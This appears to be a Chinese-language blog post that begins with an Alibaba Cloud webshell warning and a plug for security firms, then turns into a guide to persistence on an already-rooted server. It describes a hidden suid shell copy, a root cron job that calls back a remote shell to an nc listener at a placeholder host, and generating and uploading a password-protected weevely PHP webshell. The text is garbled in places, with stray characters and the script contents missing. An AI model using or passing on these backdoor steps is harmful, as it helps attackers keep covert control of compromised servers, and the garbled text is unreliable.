阿里云被提示网站后门-发现后门(Webshell)文件

阿里云的ecs服务器云凳链盾安全提示发现webshell后门文件,是因为网站有漏洞导致被黑客上传了了脚本后门也就是webshell后门,如果对程序代码熟悉的话可埋粗行以自行修复,网站漏洞的修补与木马后门的清除，需要很多专业的知识，也不仅弯哗仅是知识，还需要大量的经验积累，所以从做网站到维护网站，维护服务器，尽可能找专业的网站安全公司来解决问题，国内也就Sinesafe和绿盟、启明星辰等安全公司比较专业.

一、前提：已经是root用户戚坦，想留一个后门

suid shell

.woot前派和面的'.'并不是必须的，只是为了隐藏文件( 在文件名的最前面加上“.”，就可以在任意文件目录下进行隐藏) .

chmod 4755——作用，使所有使用.woot文件的用户都具有文件所有者的权限

此时权限并没有改变，因为bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:

二、Unix Bash 远控后门

先创建 /etc/xxxx 脚本文件

设置权限 chmod +sx /etc/door

修改一下 /etc/crontab 让它定时执行

nano /etc/crontab    在 /etc/crontab 文件末加入这一行。代表每 1 分钟尘仔盯执行一次。

*/1 * * * * root /etc/xxxx

最后重启一下 crond 的服务。（不同发行版重启方式不一样，自行查询）

service cron reload

service cron start

然后在 x.x.x.x 的服务器上使用nc 接收 Shell 即可。

三、常见的Web后门

weevely——针对php

生成密码为123的后门文件

weevely generate 123 /root/weevely.php

上传到目标服务器，然后远程连接

weevely <目标URL><密码>就能成功连接上了